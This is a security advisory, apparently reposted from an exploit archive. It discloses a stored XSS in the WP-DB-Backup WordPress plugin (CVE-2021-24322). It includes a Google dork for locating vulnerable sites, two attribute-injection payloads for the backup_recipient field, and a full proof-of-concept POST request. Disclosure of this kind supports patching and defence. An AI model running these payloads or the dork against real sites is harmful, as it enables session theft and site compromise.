WP-DB-Backup WordPress Plugin < = 2.3.3 - Authenticated Persistent XSS

/*!
- # VULNERABILITY: WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-db-backup/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Austin Matzko [ http://austinmatzko.com ]
- # SOFTWARE VERSION: <= 2.3.3
- # SOFTWARE LINK: https://wordpress.org/plugins/wp-db-backup/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24322
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP-DB-Backup plugin through v2.3.3 for WordPress.

[i] Vulnerable parameter(s): &backup_recipient=.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] " autofocus onfocus=alert(document.cookie); "

[$] " autofocus onfocus=alert(document.domain); "



### -- [ PoC | Authenticated Persistent XSS | Email backup to: ]

[!] POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
Cookie: [admin cookies]

_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dwp-db-backup&core_tables%5B%5D=wp_commentmeta&core_tables%5B%5D=wp_comments&core_tables%5B%5D=wp_links&core_tables%5B%5D=wp_options&core_tables%5B%5D=wp_postmeta&core_tables%5B%5D=wp_posts&core_tables%5B%5D=wp_term_relationships&core_tables%5B%5D=wp_term_taxonomy&core_tables%5B%5D=wp_terms&core_tables%5B%5D=wp_usermeta&core_tables%5B%5D=wp_users&deliver=smtp&backup_recipient=m0ze%40example.com%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&do_backup=fragments&submit=Backup+now%21



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

Copyright ©2024 Exploitalert.